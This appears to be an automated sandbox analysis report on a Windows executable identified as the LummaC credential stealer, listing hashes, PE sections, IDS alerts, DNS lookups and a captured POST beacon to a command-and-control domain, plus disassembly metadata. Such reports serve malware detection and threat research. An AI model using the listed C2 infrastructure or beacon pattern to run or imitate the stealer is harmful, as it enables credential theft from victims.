• file.exe: LummaC Stealer (104.21.33.116)
• file.exe: Unknown (104.21.33.116)
• file.exe: Unknown (104.21.33.116)
• file.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc (104.21.33.116)
• file.exe: LummaC Stealer (104.21.33.116)
• file.exe: Cryptbot (104.21.33.116)
• 2fQ8fpTWAP.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc (104.21.33.116)
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947908277655611
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'852'416 bytes
                            MD5:64f25a20bc6a8730e6d230e5d63dac8e
                            SHA1:f1c8a90fefc9e7789013cf9228827634ad8410f3
                            SHA256:daa2f6c445600573a591de7b8ad352699dcc9ff8b5bd2e1a6f93dc373572ceae
                            SHA512:4b0e9001c5304b3deee2dd463ab5d310cf61423d773983994167093299878f28833772a746336aaa583b036a7a6510051602bc2064f7df983ae5999aae487c87
                            SSDEEP:49152:q7Mtz/HGSALlVti6nGA+AkQ7G1x/ILNyIYvRdu:qqbmSW3EZuiD
                            TLSH:E28533CC8E02FD70C2BE8535844AB31EBB38DCF158BD26EFB3502526D613658616E56E
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I.....6.....@.................................\...p..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x898000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F66E8D5E1EAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x56000 | 0x26200 | 6253811cdcd28d17091c7ab8897cbf63 | False | 0.9992955942622951 | data | 7.981115903907639 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | 4b57f33bfb85398191260ea9fdc1b831 | False | 0.80078125 | data | 6.087687787872282 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x59000 | 0x2a3000 | 0x200 | e4a100c337094fa20742734db6440bc2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
olszqzdv | 0x2fc000 | 0x19b000 | 0x19a600 | 2609589a8d0da679dff1895e18ae441b | False | 0.9941287265839172 | data | 7.953205529312231 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iwdrpyuy | 0x497000 | 0x1000 | 0x400 | 9212de3055059128c0cef2d17cd6609c | False | 0.7587890625 | data | 6.056543629374982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x498000 | 0x3000 | 0x2200 | a14bbb075c237d2d6900fe6eeae98485 | False | 0.0646829044117647 | DOS executable (COM) | 0.7675560772419018 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x496350 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T04:20:24.488324+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:25.409417+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:25.409417+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | TCP
2024-11-24T04:20:26.779861+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49715 | 104.21.33.116 | 443 | TCP
UDP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 04:20:22.791620016 CET | 54370 | 53 | 192.168.2.7 | 1.1.1.1
Nov 24, 2024 04:20:23.208076000 CET | 53 | 54370 | 1.1.1.1 | 192.168.2.7

DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 04:20:22.791620016 CET | 192.168.2.7 | 1.1.1.1 | 0x2bff | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false

DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 04:20:23.208076000 CET | 1.1.1.1 | 192.168.2.7 | 0x2bff | No error (0) | property-imper.sbs | | 104.21.33.116 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 04:20:23.208076000 CET | 1.1.1.1 | 192.168.2.7 | 0x2bff | No error (0) | property-imper.sbs | | 172.67.162.84 | A (IP address) | IN (0x0001) | false

HTTPS domains:
• property-imper.sbs

HTTPS sessions:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49709 | 104.21.33.116 | 443 | 6444 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 03:20:24 UTC | 265 | OUT | POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: property-imper.sbs
2024-11-24 03:20:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
2024-11-24 03:20:25 UTC | 1010 | IN | HTTP/1.1 200 OK
                            Date: Sun, 24 Nov 2024 03:20:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=k80ojalprr2p79jgr8v1ajodr4; expires=Wed, 19-Mar-2025 21:07:04 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6kfq7MgnnMPSHThkvlyDHnz6kf7N40ygtPUztcotCeKXr3t9lP9o1W%2BlK5UpbciijVR4SYAsXWJkWJndAECj%2BZzC9qYt0MYunmm5RJZJgTZamNhK9jW8dl1wvwWVpC72yyqHRqY%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e764352ca02efa7-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1586094&cwnd=79&unsent_bytes=0&cid=2a30c319e3db10fe&ts=938&x=0"
                            2024-11-24 03:20:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-24 03:20:25 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0



                            Target ID: 1
                            Start time: 22:20:17
                            Start date: 23/11/2024
                            Path: C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\file.exe"
                            Imagebase: 0x580000
                            File size: 1'852'416 bytes
                            MD5 hash: 64F25A20BC6A8730E6D230E5D63DAC8E
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: low
                            Has exited: true


                              Execution Graph

                              Execution Coverage: 3.4%
                              Dynamic/Decrypted Code Coverage: 0%
                              Signature Coverage: 65.7%
                              Total number of Nodes: 230
                              Total number of Limit Nodes: 13
                              execution_graph: serialized node/edge listing of the execution graph (230 nodes, 13 limit nodes), rendered as an interactive graph in the original report. API calls referenced by its nodes: LdrInitializeThunk, RtlAllocateHeap, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, SysAllocString, SysFreeString, GetVolumeInformationW, CoUninitialize, FreeLibrary, ExitProcess.

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic-block listing for the function at 5b9030 (blocks 0-117, addresses 5b9030-5b97f5), rendered as an interactive graph in the original report. API calls in the graph: SysAllocString, CoSetProxyBlanket, GetVolumeInformationW, SysFreeString (x2); internal calls: 5bf9a0, 5a0650, 588330, 5882b0, 5882e0, 5882c0.
                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 005B91B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005B91FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-4011188741
                              • Opcode ID: 7dd6c665074f8cd51f0e771e97ea85921a383cc7c390aa6dc28deae518a8b1ea
                              • Instruction ID: 8055a308ee75d9ff09c806319bd22a6c94f8f426722659322c7abdb388793363
                              • Opcode Fuzzy Hash: 7dd6c665074f8cd51f0e771e97ea85921a383cc7c390aa6dc28deae518a8b1ea
                              • Instruction Fuzzy Hash: 132232B19083019BE724CF24CC81BABBFA5FF95354F148A1CE6959B2C1D774E905CB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic-block listing for the function at 58cf05 (blocks 118-172, addresses 58cf05-58d791), rendered as an interactive graph in the original report. Internal calls in the graph: 588930, 5b9030 (x2), 58b960 (x2); no API calls are made directly from this function.
                              Strings
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$AEB601D02E944A86D7CBBD6DF28D3732$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                              • API String ID: 0-2149072787
                              • Opcode ID: 410ec9566e562f552e3040cb9a848c2998f4f05348c055f0aa8a95fb4ae4f9df
                              • Instruction ID: 1da3b1a4c595bbb26ccaaad6b5aada189cee1c81a011d5048d25c60d93075668
                              • Opcode Fuzzy Hash: 410ec9566e562f552e3040cb9a848c2998f4f05348c055f0aa8a95fb4ae4f9df
                              • Instruction Fuzzy Hash: 9C12FDB15483C18ED3358F25C495BEFBFE1ABD2304F18895CC8DA6B256D775090ACBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: basic-block listing for the function at 5889a0 (blocks 203-227, addresses 5889a0-588cbb), rendered as an interactive graph in the original report. API call in the graph: ExitProcess; internal calls: 5bcb70, 5b6620, 5bdeb0, 589ed0, 58ce80, 58b930.
                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 00588CB5
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 73f29d8c06b3eea324a0435da29a4a1fc485daf18ad341be51d61e55cc25ed0e
                              • Instruction ID: c89b3aae8934bcf52ce1dd49fbbe61421310e242e8eaa9e664b8e0a89affa323
                              • Opcode Fuzzy Hash: 73f29d8c06b3eea324a0435da29a4a1fc485daf18ad341be51d61e55cc25ed0e
                              • Instruction Fuzzy Hash: B071E573B547054BC708DEBADC9236AFAD6ABC8714F09D83DA884DB390EA789C054785

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 5bdf70-5bdfa2 LdrInitializeThunk
                              APIs
                              • LdrInitializeThunk.NTDLL(005BBA46,?,00000010,00000005,00000000,?,00000000,?,?,00599158,?,?,005919B4), ref: 005BDF9E
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 5bb7e0-5bb7ff 230 5bb800-5bb83d 229->230 230->230 231 5bb83f-5bb85b RtlAllocateHeap 230->231
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 005BB84E
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 509b7b018472806ac4ea15a58c8ae0ae8d3205a0ba8dee01bd9fc4239761ef34
                              • Instruction ID: c6417a11d5bab5975000d37a65de8cd85462ae4ae993ddeb352e35314019fedd
                              • Opcode Fuzzy Hash: 509b7b018472806ac4ea15a58c8ae0ae8d3205a0ba8dee01bd9fc4239761ef34
                              • Instruction Fuzzy Hash: 6D019E33A457040BC310AF7CDCD4646BB56EFD9324F25463DE5D4873D0D531990AC295

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 58ce80-58ceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0058CE94
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: c7c7a84c2a51323474a3e373a40459598ca3eddbcd98ca97301b6a76876b3867
                              • Instruction ID: 727f07ad0e92e871d576d787e28a7058045f931623b1dc4460942090e94d8460
                              • Opcode Fuzzy Hash: c7c7a84c2a51323474a3e373a40459598ca3eddbcd98ca97301b6a76876b3867
                              • Instruction Fuzzy Hash: 7CD0A7212A06497BE114A21CEC5BF27325DC702754F440626A6A2EA2D2D951AA1AA067

                              Control-flow Graph

                              control_flow_graph 233 58ceb3-58cee2 CoInitializeSecurity
                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0058CEC5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: 13e0897bee8516b3b75f34ef81fb2cea92b58ff28e8b5148d364b23a43d2a993
                              • Instruction ID: 52a5f6db689a55af9d60a73dba68f62626b6a98fb07e302381cdfed898621a74
                              • Opcode Fuzzy Hash: 13e0897bee8516b3b75f34ef81fb2cea92b58ff28e8b5148d364b23a43d2a993
                              • Instruction Fuzzy Hash: 69D0C9303D8741BAF96446589C13F1022054715F2AF340608B322FE2D1CCD07242D508

                              Control-flow Graph

                              control_flow_graph 265 58d7d3-58d7d8 CoUninitialize 266 58d7da-58d7e1 265->266
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              • Opcode ID: 3b7ec3d72c9ae2a77c5e7157d3383ac518db3211eee00e7f4c2b10f39024bb43
                              • Instruction ID: 64c1c76747dac98cf07f7ee528d8371df797e86caa126fa0fe462e79efaf3032
                              • Opcode Fuzzy Hash: 3b7ec3d72c9ae2a77c5e7157d3383ac518db3211eee00e7f4c2b10f39024bb43
                              • Instruction Fuzzy Hash: 09A02437F10014445F4000F47C010DDF310D1C00377100373C31CC1400D533113501C1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              • Opcode ID: bd1d24e0b24caa679d9c368eeee7c8795e56e644f670d84096baf3e58f48bdbf
                              • Instruction ID: e4b1abc872b70317c7a436bef9fca2cf225caa93d57378b5273910e16cd04311
                              • Opcode Fuzzy Hash: bd1d24e0b24caa679d9c368eeee7c8795e56e644f670d84096baf3e58f48bdbf
                              • Instruction Fuzzy Hash: DB2258B150C3808FD7218B68C4943AEBFE1BBD6314F184D2DE5D987392D6BA8885CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction ID: 7583be8c9f8ac9e8bc548a5a6cf7a09010454c822d05f03796c1a2045ce6d023
                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction Fuzzy Hash: 20B1C47010C3818FD3159F2984607ABBFE1AFD7744F1849ACE8D59B392D779890ACB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 76Os$;z>&$OL~g$Suwr$YU{$ZR/-$ld&o$g[$l=S$O
                              • API String ID: 0-2175548767
                              • Opcode ID: 08e5ae7bb4bdca518743a99796c743b89c4c721d7e21ae185db29043f6676ce6
                              • Instruction ID: f3c5608f7dc952c4458f4367e69cbed86cc0b003f8ba97c615be5c3da0886fc7
                              • Opcode Fuzzy Hash: 08e5ae7bb4bdca518743a99796c743b89c4c721d7e21ae185db29043f6676ce6
                              • Instruction Fuzzy Hash: 13B204F360C2049FE3046F2DEC8567AFBE9EF94720F1A893DE6C487744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: AEB601D02E944A86D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                              • API String ID: 0-3516816777
                              • Opcode ID: 18dbfeac06619af780b1792aae0466b3e74e7fbe4297d7cb1ea1160716d4dbba
                              • Instruction ID: 3a3ae601bd9aa96bf0d5e5ddf8d2ba1188315be029e4cba96957aea836c0b45d
                              • Opcode Fuzzy Hash: 18dbfeac06619af780b1792aae0466b3e74e7fbe4297d7cb1ea1160716d4dbba
                              • Instruction Fuzzy Hash: 6BE14972A483508BD328DF35C89176BBFE6BBD1314F198A2DE9E59B391D634C805CB42
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: %in$;($$<3B=$D$v$ub'=$yr_7$yr_7$.xf
                              • API String ID: 0-3003952328
                              • Opcode ID: 375e9fea59c60336e2035fd301b368dd3400e0b51eaf587ddf5b7aba792c2331
                              • Instruction ID: 680c59ac83474705b5733a92e2d6864020e505ca3fde7fc1828dab4696dba4d2
                              • Opcode Fuzzy Hash: 375e9fea59c60336e2035fd301b368dd3400e0b51eaf587ddf5b7aba792c2331
                              • Instruction Fuzzy Hash: 36B204F360C200AFE704AE29EC8567ABBE5EF94320F16493DEAC5C7744E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                              • API String ID: 0-3274379026
                              • Opcode ID: e830f173923324584523030b5db9e2096f979c8473815df586c0c92b9e4e1f7f
                              • Instruction ID: d39b6f68c02c4c5412629528ffd719df41674dda1ed185f4a582c49def8a996d
                              • Opcode Fuzzy Hash: e830f173923324584523030b5db9e2096f979c8473815df586c0c92b9e4e1f7f
                              • Instruction Fuzzy Hash: CB5157725183518BD720CF25C8906ABBBF2FFD2315F18895CE8C19B255EB788D0AC792
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @{?$CW{7$O'Y$o;uo$o[E+$A^'
                              • API String ID: 0-958857900
                              • Opcode ID: 4276aa00c1091fabbcd49292a512e093b1f04ee323a1c4d0bc433bb0bcab1ab6
                              • Instruction ID: 989915dd0470d2d287da28180dad8911f14e4455c407c206703e88eb88682dc2
                              • Opcode Fuzzy Hash: 4276aa00c1091fabbcd49292a512e093b1f04ee323a1c4d0bc433bb0bcab1ab6
                              • Instruction Fuzzy Hash: 277209F3A082109FD304AE2DEC8567AB7E9EFD4720F1A853DE6C4C7744EA3598058796
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,TX$2LX$@OX$bKX$bMX$zQX
                              • API String ID: 0-1372052347
                              • Opcode ID: 7cc4dbc204f927d57bfc7096879990925f542dc0fbb63c9883f8e65b1f6df747
                              • Instruction ID: 8335ff283f2965e92d7bdb134a6d26ce0536fdd8f88a63c65aaef78b8c14f512
                              • Opcode Fuzzy Hash: 7cc4dbc204f927d57bfc7096879990925f542dc0fbb63c9883f8e65b1f6df747
                              • Instruction Fuzzy Hash: 33426834608741DFD704CF28D894B5ABBE1FF98355F04896CE8898B291E775E988DF42
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: =4C.$=Ys{$eL^$ttu]
                              • API String ID: 0-1510028980
                              • Opcode ID: 1c8279e10e347b9b645f25fd1df0b5aaf27fe4ede59350238caf83abc60ed4ee
                              • Instruction ID: f60ac0aa856d75647de14ded1e26ab40c4082e779b276976cf0b0eba47e31bfe
                              • Opcode Fuzzy Hash: 1c8279e10e347b9b645f25fd1df0b5aaf27fe4ede59350238caf83abc60ed4ee
                              • Instruction Fuzzy Hash: 3EA2F6F360C2049FE304AE2DEC8577ABBE9EF94720F16493DEAC4C7744E63598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
